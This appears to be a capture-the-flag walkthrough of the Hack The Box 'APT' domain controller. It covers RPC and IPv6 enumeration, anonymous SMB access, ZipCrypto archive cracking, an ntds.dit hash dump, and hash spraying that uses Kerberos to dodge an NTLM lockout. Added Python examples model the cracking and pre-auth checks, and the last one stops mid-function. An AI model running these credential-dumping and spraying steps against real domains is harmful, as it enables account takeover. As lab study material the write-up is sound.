The lab environment is quite unstable and frequently drops the connection for a while. It also filters ports 37 and 123, so the domain controller's time cannot be synced over NTP; htpdate, which syncs over HTTP, works instead.
Pwnbox is recommended for this box.
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nmap 10.10.10.213 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 09:19 EDT
Nmap scan report for 10.10.10.213
Host is up (0.083s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
Nmap done: 1 IP address (1 host up) scanned in 20.22 seconds
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nmap 10.10.10.213 -p 80,135 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 09:28 EDT
Nmap scan report for 10.10.10.213
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Gigantic Hosting | Home
135/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.69 seconds
The site belongs to Gigantic Hosting, a company selling servers and hosting.
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# dirsearch -u http://10.10.10.213/ -x 403
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/apt/reports/http_10.10.10.213/__25-08-08_09-33-35.txt
Target: http://10.10.10.213/
[09:33:35] Starting:
[09:33:36] 301 - 146B - /js -> http://10.10.10.213/js/
[09:33:41] 200 - 9KB - /about.html
[09:33:52] 200 - 12KB - /clients.html
[09:33:53] 301 - 147B - /css -> http://10.10.10.213/css/
[09:33:56] 301 - 149B - /fonts -> http://10.10.10.213/fonts/
[09:33:58] 301 - 150B - /images -> http://10.10.10.213/images/
[09:34:03] 200 - 5KB - /news.html
[09:34:11] 200 - 6KB - /support.html
Task Completed
Browsing those directories only returns errors.
The support page has a form; submitting it ends in a failed redirect.
The redirect target is not in the target's 10.10.x.x range but in 10.13.x.x, so it points at an internal service that we cannot reach from here.
Viewing the page source gives a hint:
Mirrored from 10.13.38.16/support.html
The site is a static mirror of 10.13.38.16, which is why the form's internal address is unreachable. The generator comment reads HTTrack Website Copier/3.x.
HTTrack is a tool that saves a complete static copy of a website to local disk, a bit like SingleFile or Teleport Ultra.
I searched for known attack vectors against HTTrack and found two, but neither applies here: we are outside the network and cannot interact with the machine that ran the mirror.
Port 135 being open must be deliberate. If the web site were the intended path, the author would have exposed only port 80 to keep the attack surface minimal. Since the web route looks like a dead end, port 135 is the likely way in.
TCP 135 is the RPC endpoint mapper and the DCOM Service Control Manager. Impacket's rpcmap.py lists the interfaces registered there; it takes a stringbinding argument to connect.
Use impacket-rpcmap to enumerate the endpoint mappings:
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# impacket-rpcmap 'ncacn_ip_tcp:10.10.10.213'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0
Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1
Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0
Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0
Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2
Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0
Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0
Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0
This lists many RPC interfaces by UUID. The DCOM-related ones are defined in the MS-DCOM specification.
Several DCOM remote interfaces are exposed, among them IObjectExporter (IOXIDResolver), UUID 99FCFEC4-5260-101B-BBCB-00AA0021347A. This interface is well known from the Potato family of privilege-escalation exploits.
When IOXIDResolver is reachable on a Windows host, it can be queried, anonymously or with credentials, to discover the host's other network endpoints, such as its IPv6 address.
# IOXIDResolver endpoint and UUID
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
IOXIDResolver-ng.py talks to the IObjectExporter interface over MSRPC and calls ServerAlive2, which returns the string bindings (network addresses) the host is reachable on:
┌──(root㉿kali)-[~/Desktop/htb/apt/IOXIDResolver-ng]
└─# python IOXIDResolver-ng.py -t 10.10.10.213
|==========================|
| IOXIDResolver Next Gen |
|==========================|
[*] Anonymous connection on MSRPC
[*] Retrieve Network Interfaces for 10.10.10.213...
[+] ServerAlive2 methode return 3 interface(s)
[+] aNetworkAddr addresse : apt (Hostname)
[+] aNetworkAddr addresse : 10.10.10.213 (IPv4)
[+] aNetworkAddr addresse : dead:beef::b885:d62a:d679:573f (IPv6)
This gives us the target's IPv6 address.
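What ServerAlive2 actually hands back is a DUALSTRINGARRAY (MS-DCOM 2.2.19): a list of STRINGBINDINGs, each a 16-bit tower id plus a NUL-terminated UTF-16LE network address, followed by the SECURITYBINDINGs. IOXIDResolver-ng hides that structure; the parser below is an added example (not code from the writeup or from IOXIDResolver-ng/impacket) that decodes such a blob. The sample bytes are constructed here from the three addresses the tool printed, since the live response was not captured on the page.

```python
import struct

# Tower ids used in DCOM string bindings (MS-RPCE protocol identifiers).
TOWER_IDS = {
    0x07: "ncacn_ip_tcp",
    0x08: "ncadg_ip_udp",
    0x0F: "ncacn_np",
    0x1F: "ncacn_http",
}

def _read_wstr(buf: bytes, off: int) -> tuple[str, int]:
    """Read a NUL-terminated UTF-16LE string at byte offset off.
    Returns (string, offset just past the 2-byte terminator)."""
    end = off
    while buf[end:end + 2] != b"\x00\x00":
        if end + 2 > len(buf):
            raise ValueError("unterminated string in DUALSTRINGARRAY")
        end += 2
    return buf[off:end].decode("utf-16-le"), end + 2

def parse_dual_string_array(buf: bytes) -> dict:
    """Parse a DUALSTRINGARRAY as returned in ServerAlive2's ppdsaOrBindings.

    Layout: wNumEntries (u16, length of aStringArray in 16-bit words),
    wSecurityOffset (u16, offset in words to the security bindings), then
    STRINGBINDINGs {wTowerId, aNetworkAddr} terminated by a 0x0000 tower id,
    then SECURITYBINDINGs {wAuthnSvc, wReserved=0xFFFF, aPrincName}
    terminated by a 0x0000 authn service."""
    num_entries, sec_off = struct.unpack_from("<HH", buf, 0)
    body = buf[4:4 + num_entries * 2]
    if len(body) != num_entries * 2:
        raise ValueError("truncated DUALSTRINGARRAY")

    bindings = []
    off = 0
    while True:
        tower_id = struct.unpack_from("<H", body, off)[0]
        off += 2
        if tower_id == 0:  # end of the string-binding list
            break
        addr, off = _read_wstr(body, off)
        bindings.append((TOWER_IDS.get(tower_id, f"tower_{tower_id:#x}"), addr))

    security = []
    off = sec_off * 2  # wSecurityOffset counts 16-bit words, not bytes
    while True:
        authn_svc = struct.unpack_from("<H", body, off)[0]
        off += 2
        if authn_svc == 0:
            break
        off += 2  # wReserved (0xFFFF)
        princ, off = _read_wstr(body, off)
        security.append((authn_svc, princ))
    return {"bindings": bindings, "security": security}

def build_dual_string_array(addrs, authn=((0x0A, ""),)) -> bytes:
    """Constructed sample data only: serialise bindings the way a server would
    (tower 7 = ncacn_ip_tcp for every address, authn 10 = RPC_C_AUTHN_WINNT)."""
    sb = b"".join(struct.pack("<H", 0x07) + a.encode("utf-16-le") + b"\x00\x00" for a in addrs)
    sb += b"\x00\x00"
    secb = b"".join(struct.pack("<HH", svc, 0xFFFF) + p.encode("utf-16-le") + b"\x00\x00"
                    for svc, p in authn)
    secb += b"\x00\x00"
    body = sb + secb
    return struct.pack("<HH", len(body) // 2, len(sb) // 2) + body

def addresses_from_server_alive2(buf: bytes) -> list[str]:
    """The part an attacker cares about: every network address the host
    advertises, including IPv6 ones that the IPv4 firewall never shows."""
    return [addr for _, addr in parse_dual_string_array(buf)["bindings"]]

# Constructed from the three addresses ServerAlive2 returned for this box.
SAMPLE = build_dual_string_array(["apt", "10.10.10.213", "dead:beef::b885:d62a:d679:573f"])

if __name__ == "__main__":
    for addr in addresses_from_server_alive2(SAMPLE):
        print(addr)
```

The same parser works on the raw `ppdsaOrBindings` bytes if you call ServerAlive2 yourself with impacket's DCOM classes; the host's IPv6 address shows up as a plain ncacn_ip_tcp binding, which is why an anonymous RPC call is enough to learn it.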
Port-scan the IPv6 address with nmap (-6):
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nmap -6 dead:beef::b885:d62a:d679:573f -p- --min-rate 5000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 12:32 EDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.21s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49673/tcp open unknown
49708/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 46.84 seconds
# nmap -6 dead:beef::b885:d62a:d679:573f -p 53,80,88,135,389,445,464,593,636,3268,3269,5985,9389 -sCV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-08 11:43 CDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-08 16:19:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2025-08-08T17:19:48+01:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -32m50s, deviation: 22m39s, median: -24m17s
| smb2-time:
| date: 2025-08-08T16:19:45
|_ start_date: 2025-08-08T13:11:37
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nxc smb dead:beef::b885:d62a:d679:573f --shares -u '' -p ''
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows 10 / Server 2016 Build 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB dead:beef::b885:d62a:d679:573f 445 APT [+] htb.local\:
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Enumerated shares
SMB dead:beef::b885:d62a:d679:573f 445 APT Share Permissions Remark
SMB dead:beef::b885:d62a:d679:573f 445 APT ----- ----------- ------
SMB dead:beef::b885:d62a:d679:573f 445 APT backup READ
SMB dead:beef::b885:d62a:d679:573f 445 APT IPC$ Remote IPC
SMB dead:beef::b885:d62a:d679:573f 445 APT NETLOGON Logon server share
SMB dead:beef::b885:d62a:d679:573f 445 APT SYSVOL Logon server share
Unlike the IPv4 side, the IPv6 interface exposes the full domain controller service set, and SMB allows a null session: the backup share is readable anonymously.
Also note the clock skew the scan reported (-24m17s against the DC). Kerberos rejects requests outside a five-minute window and NTP (123) is filtered, so sync the attacker clock with htpdate over HTTP before doing anything Kerberos-related.
Look at the contents of the backup share:
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# smbclient \\\\dead:beef::b885:d62a:d679:573f\\backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 03:30:52 2020
.. D 0 Thu Sep 24 03:30:52 2020
backup.zip A 10650961 Thu Sep 24 03:30:32 2020
5114623 blocks of size 4096. 2637473 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (1096.4 KiloBytes/sec) (average 1096.4 KiloBytes/sec)
There is a single backup.zip, and it is password-protected.
Use zip2john to turn the archive into a crackable hash:
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# zip2john backup.zip
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
backup.zip:$pkzip$4*1*1*0*8*24*9beb*0f135e8d5f02f852643d295a889cbbda196562ad42425146224a8804421ca88f999017ed*1*0*8*24*65d9*2a1c4c81fb6009425c2d904699497b75d843f69f8e623e3edb81596de9e732057d17fae8*1*0*8*24*acd0*0949e46299de5eb626c75d63d010773c62b27497d104ef3e2719e225fbde9d53791e11a5*2*0*156*4000*2a393785*81733d*37*8*156*2a39*0325586c0d2792d98131a49d1607f8a2215e39d59be74062d0151084083c542ee61c530e78fa74906f6287a612b18c788879a5513f1542e49e2ac5cf2314bcad6eff77290b36e47a6e93bf08027f4c9dac4249e208a84b1618d33f6a54bb8b3f5108b9e74bc538be0f9950f7ab397554c87557124edc8ef825c34e1a4c1d138fe362348d3244d05a45ee60eb7bba717877e1e1184a728ed076150f754437d666a2cd058852f60b13be4c55473cfbe434df6dad9aef0bf3d8058de7cc1511d94b99bd1d9733b0617de64cc54fc7b525558bc0777d0b52b4ba0a08ccbb378a220aaa04df8a930005e1ff856125067443a98883eadf8225526f33d0edd551610612eae0558a87de2491008ecf6acf036e322d4793a2fda95d356e6d7197dcd4f5f0d21db1972f57e4f1543c44c0b9b0abe1192e8395cd3c2ed4abec690fdbdff04d5bb6ad12e158b6a61d184382fbf3052e7fcb6235a996*$/pkzip$::backup.zip:Active Directory/ntds.jfm, registry/SECURITY, registry/SYSTEM, Active Directory/ntds.dit:backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
Crack it with hashcat (mode 17220, PKZIP compressed multi-file):
hashcat.exe -m 17220 hash.txt rockyou.txt
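The reason a 10 MB encrypted archive cracks at rockyou speed is the ZipCrypto ("traditional PKWARE encryption") design: each member starts with a 12-byte encrypted header whose last byte must equal the high byte of the member's CRC-32 (or of the DOS time when flag bit 3 is set), so a candidate password is rejected after 12 key-schedule steps without inflating anything. The block below is an added example (not from the writeup, john or hashcat) implementing that cipher and the check-byte filter; the CRC value comes from zip2john's ntds.dit line above, the password and the eleven "random" header bytes are constructed.

```python
# ZipCrypto stream cipher (APPNOTE.TXT section 6.1) and the check-byte filter
# that zip2john/hashcat -m 17220 rely on.

CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (0xEDB88320 ^ (c >> 1)) if c & 1 else c >> 1
    CRC_TABLE.append(c)

def _crc_update(crc: int, b: int) -> int:
    return CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)

class ZipCrypto:
    """Three 32-bit keys initialised from constants and stirred with the password."""
    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = _crc_update(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc_update(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plain: bytes) -> bytes:
        out = bytearray()
        for p in plain:
            out.append(p ^ self._keystream_byte())
            self._update(p)  # the key state is advanced with the plaintext byte
        return bytes(out)

    def decrypt(self, cipher: bytes) -> bytes:
        out = bytearray()
        for c in cipher:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)

def make_encryption_header(password: bytes, crc32: int, random11: bytes) -> bytes:
    """What a zip tool writes in front of the compressed data: 11 random bytes
    plus the check byte (high byte of the CRC). random11 is normally
    os.urandom(11); a fixed constructed value keeps this example reproducible."""
    assert len(random11) == 11
    return ZipCrypto(password).encrypt(random11 + bytes([crc32 >> 24]))

def check_byte_matches(candidate: bytes, enc_header: bytes, crc32: int) -> bool:
    """The fast filter: decrypt just 12 bytes and compare a single byte."""
    return ZipCrypto(candidate).decrypt(enc_header)[-1] == (crc32 >> 24)

def crack_header(enc_header: bytes, crc32: int, wordlist) -> list[bytes]:
    """Every candidate that survives the check byte. The real password is always
    included; about 1 in 256 wrong guesses also survives and must be rejected
    by inflating the member and verifying the full CRC-32."""
    return [w for w in wordlist if check_byte_matches(w, enc_header, crc32)]

# Constructed sample. CRC taken from zip2john's output for ntds.dit above.
NTDS_CRC = 0xACD0B2FB
SAMPLE_PASSWORD = b"Sup3rS3cret!"  # hypothetical, not the real archive password
SAMPLE_HEADER = make_encryption_header(SAMPLE_PASSWORD, NTDS_CRC, bytes(range(1, 12)))

if __name__ == "__main__":
    words = [b"password", b"123456", b"letmein", SAMPLE_PASSWORD, b"iloveyou"]
    print(crack_header(SAMPLE_HEADER, NTDS_CRC, words))
```

zip2john's warning that all members are assumed to share one password follows from this: the hash line bundles several members' headers so that surviving false positives from one member are eliminated by the others' check bytes before any inflation happens.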
The archive contains a backup of Active Directory: ntds.dit together with the SYSTEM and SECURITY hives needed to decrypt it.
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# tree ./backup
./backup
├── Active Directory
│ ├── ntds.dit
│ └── ntds.jfm
└── registry
├── SECURITY
└── SYSTEM
3 directories, 4 files
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# impacket-secretsdump -ntds ./Active\ Directory/ntds.dit -system registry/SYSTEM -outputfile hashes LOCAL
....
gen.mathews:3557:aad3b435b51404eeaad3b435b51404ee:ed5d3cae04480cbb857f599cf39d901f:::
delilah.good:3558:aad3b435b51404eeaad3b435b51404ee:1651ec611b22840f6ed9207b042c49dc:::
juliette.morton:3559:aad3b435b51404eeaad3b435b51404ee:e0432c2f02f2dd084e54a81b86cb3401:::
mick.curtis:3560:aad3b435b51404eeaad3b435b51404ee:8d4899f60857d1187c15819c7743b981:::
eoghan.hicks:3561:aad3b435b51404eeaad3b435b51404ee:8709670f01d7ad14f8e47041ec259e2f:::
ezella.bartlett:3562:aad3b435b51404eeaad3b435b51404ee:916a8964c73f0b666e3479613fe1e6e0:::
lynette.beach:3563:aad3b435b51404eeaad3b435b51404ee:0cdba00b4608757d1aa9f2a4aa95a538:::
.....
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds|wc -l
2000
That dumped 2000 hashes in one go.
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds| grep -i administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Try the Administrator hash first. I did not expect it to work, and it does not, so the backup is presumably stale.
Still, this many users and hashes is effectively a dictionary. First build a username list:
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds| cut -d ':' -f1 >users
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat users|head
Administrator
Guest
DefaultAccount
APT$
krbtgt
jeb.sloan
ranson.mejia
unice.daugherty
kazuo.deleon
dacy.frederick
Then use Kerbrute to enumerate which of them are valid domain users:
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# kerbrute userenum --dc apt.htb.local -d htb.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/09/25 - Ronnie Flathers @ropnop
2025/08/09 01:21:10 > Using KDC(s):
2025/08/09 01:21:10 > apt.htb.local:88
2025/08/09 01:21:15 > [+] VALID USERNAME: APT$@htb.local
2025/08/09 01:21:15 > [+] VALID USERNAME: Administrator@htb.local
2025/08/09 01:25:07 > [+] VALID USERNAME: henry.vinson@htb.local
2025/08/09 01:38:25 > Done! Tested 2000 usernames (3 valid) in 1035.540 seconds
Three valid users. Check whether their dumped hashes still log in:
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds|grep henry.vinson
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
So the 2000 dumped hashes probably have to be sprayed against henry.vinson as candidate credentials. Extract the NT hashes:
cat hashes.ntds | cut -d ':' -f4 > hash_lists
Then spray:
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# nxc smb htb.local -u henry.vinson -H hash_lists
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30 STATUS_LOGON_FAILURE
Kerbrute's user enumeration did not get me blocked, but the SMB spray with nxc did.
The difference is the authentication protocol: Kerberos in the first case, NTLM over SMB in the second.
Adding -k makes nxc authenticate via Kerberos, which bypasses the block:
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-bbskiercmm]─[~/apt]
└──╼ [★]#$ nxc smb htb.local -u henry.vinson -H hash_lists -k |grep -v KDC_ERR_PREAUTH_FAILED
SMB htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB htb.local 445 APT [-] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb KRB_AP_ERR_SKEW
Almost every candidate fails with KDC_ERR_PREAUTH_FAILED, i.e. pre-authentication failed because the key derived from the hash is wrong. There are too many of those, so I used grep to filter them out.
A single hash is left with a different error, KRB_AP_ERR_SKEW, a clock-skew error. The KDC can only inspect the encrypted timestamp after it has decrypted the pre-authentication data with the key derived from the supplied hash, so a skew error means the hash was correct and only our clock is off.
Dropping -k so nxc authenticates over SMB/NTLM, and testing just this one credential:
nxc smb htb.local -u henry.vinson -H e53d87d42adaa3ca32bdb34a876cbffb
The credential is valid.
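To make the PREAUTH_FAILED versus SKEW distinction concrete, here is an added example (not from the writeup or from nxc/impacket) that models both sides of RC4-HMAC pre-authentication (etype 23, RFC 4757): the client encrypts a timestamp under the NT hash, and the KDC can only evaluate that timestamp once the blob decrypts and its HMAC checks out under the candidate key. The spray function replays the situation above: a few hashes from the dump tried against a KDC holding henry.vinson's hash, with the attacker clock off by the -24m17s nmap reported. Simplification: the real PA-ENC-TS-ENC is a DER SEQUENCE {patimestamp, pausec}; here only the KerberosTime string is encrypted.

```python
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4, the bulk cipher of etype 23."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

KEY_USAGE_AS_REQ_PA_ENC_TIMESTAMP = 1  # RFC 4120 section 7.5.1

def rc4_hmac_encrypt(nt_hash: bytes, usage: int, plaintext: bytes, confounder: bytes = b"") -> bytes:
    """RFC 4757 section 5. The NT hash is used directly as the Kerberos key."""
    k1 = _hmac_md5(nt_hash, usage.to_bytes(4, "little"))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)

def rc4_hmac_decrypt(nt_hash: bytes, usage: int, blob: bytes) -> bytes:
    """Plaintext without the confounder, or ValueError when the checksum fails.
    That failure is exactly what the KDC reports as KDC_ERR_PREAUTH_FAILED."""
    k1 = _hmac_md5(nt_hash, usage.to_bytes(4, "little"))
    checksum, ct = blob[:16], blob[16:]
    k3 = _hmac_md5(k1, checksum)
    data = rc4(k3, ct)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        raise ValueError("integrity check failed")
    return data[8:]

KRB_TIME_FMT = "%Y%m%d%H%M%SZ"  # KerberosTime, e.g. 20250808161906Z

def build_pa_enc_timestamp(nt_hash: bytes, client_now: datetime) -> bytes:
    """Client side: encrypt the current time under the (candidate) NT hash."""
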